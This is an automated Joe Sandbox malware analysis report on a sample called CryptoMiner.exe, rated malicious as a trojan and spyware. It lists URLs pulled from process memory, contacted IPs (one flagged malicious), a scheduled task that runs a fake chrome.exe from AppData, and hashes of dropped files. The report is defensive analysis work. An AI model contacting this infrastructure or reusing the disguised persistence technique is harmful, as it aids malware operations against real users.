                              https://duckduckgo.com/ac/?q=InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/faultLInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.vmware.com/0fname.exe.12.drfalse
                                    		high
                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id12ResponseInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://tempuri.org/InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id2ResponseInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://45.9.20.314VlInstallUtil.exe, 0000000C.00000002.659462830.0000000002F67000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://ns.adobe.c/gInstallUtil.exe, 0000000C.00000002.656645337.000000000131D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000003.647783413.000000000131C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id21ResponseInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id9InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id8InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id5InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Entity/Id4InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://tempuri.org/Entity/Id7InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://tempuri.org/Entity/Id6InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://tempuri.org/Entity/Id19ResponseInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://ip-api.comAppLaunch.exe, 00000016.00000002.688558228.0000000007047000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000016.00000002.688597556.000000000705A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsatInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id15ResponseInstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000016.00000002.688558228.0000000007047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.696959408.000001C92E5E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://tempuri.org/Entity/Id6ResponseInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.ip.sb/ipCryptoMiner.exe, 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, CryptoMiner.exe, 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000000.543024251.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/scInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://tempuri.org/Entity/Id9ResponseInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://contoso.com/Iconpowershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id20InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://tempuri.org/Entity/Id21InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sInstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://tempuri.org/Entity/Id22InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id23InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://tempuri.org/Entity/Id24InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://tempuri.org/Entity/Id24ResponseInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.659905866.0000000002FA6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://tempuri.org/Entity/Id1ResponseInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.symauth.com/cps0(fname.exe.12.drfalse
                                                                                              		high
                                                                                              https://github.com/Pester/Pesterpowershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.symauth.com/rpa00fname.exe.12.drfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trustInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://tempuri.org/Entity/Id10InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://tempuri.org/Entity/Id11InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://tempuri.org/Entity/Id12InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://tempuri.org/Entity/Id16ResponseInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id13InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id14InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id15InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id16InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/NonceInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://tempuri.org/Entity/Id17InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://tempuri.org/Entity/Id18InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://tempuri.org/Entity/Id5ResponseInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.657986199.0000000002DFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://tempuri.org/Entity/Id19InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://tempuri.org/Entity/Id10ResponseInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RenewInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://tempuri.org/Entity/Id8ResponseInstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://ocsp.sectigo.com0InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyInstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high

                                                                                                                                      World Map of Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public IPs

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      208.95.112.1
                                                                                                                                      		ip-api.comUnited States
                                                                                                                                      		53334TUT-ASUSfalse
                                                                                                                                      65.21.213.209
                                                                                                                                      		unknownUnited States
                                                                                                                                      		199592CP-ASDEtrue
                                                                                                                                      45.9.20.31
                                                                                                                                      		unknownRussian Federation
                                                                                                                                      		35913DEDIPATH-LLCUSfalse

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                      Analysis ID:620659
                                                                                                                                      Start date and time: 05/05/202203:28:102022-05-05 03:28:10 +02:00
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 12m 45s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:light
                                                                                                                                      Sample file name:CryptoMiner.exe
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                      Number of analysed new started processes analysed:30
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • HDC enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@15/5@1/3
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 66.7%
                                                                                                                                      HDC Information:
                                                                                                                                      • Successful, ratio: 32.9% (good quality ratio 30.7%)
                                                                                                                                      • Quality average: 77%
                                                                                                                                      • Quality standard deviation: 28.4%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 71%
                                                                                                                                      • Number of executed functions: 0
                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                      • Adjust boot time
                                                                                                                                      • Enable AMSI

                                                                                                                                      Warnings

                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com
                                                                                                                                      • Execution Graph export aborted for target filename.exe, PID 4584 because it is empty
                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 4036 because it is empty
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • VT rate limit hit for: CryptoMiner.exe

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      03:30:46API Interceptor85x Sleep call for process: InstallUtil.exe modified
                                                                                                                                      03:31:21API Interceptor11x Sleep call for process: powershell.exe modified
                                                                                                                                      03:31:44Task SchedulerRun new task: chrome path: C:\Users\user\AppData\Roaming\Chrome\chrome.exe

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      No context

                                                                                                                                      Domains

                                                                                                                                      No context

                                                                                                                                      ASNs

                                                                                                                                      No context

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      No context

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2932
                                                                                                                                      Entropy (8bit):5.334469918014252
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHK7HKhBHKdHKB1AHKzvQTHmtHoxHImHK1HjHKv:iqXeqm00YqhQnouOq7qLqdqUqzcGtIx7
                                                                                                                                      MD5:02054701434F73C34E5333237A4CA701
                                                                                                                                      SHA1:CC1A321DC8C9217A236E29B9811C37E6F50032B9
                                                                                                                                      SHA-256:49F5D3693BA0F7484CE457258C12B6C95D670D5E78B9C602EBA68F134DEB7F9D
                                                                                                                                      SHA-512:A30F45328A78ED712E366FDF1F57F9B2CF4BB3A120747BDD26DADDAE932B37B9C0C839CE9EDB10650506DA95D5FF4946E624D5A442B24D59E288FEC9C712E8BF
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uf4rrw2m.dux.ps1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
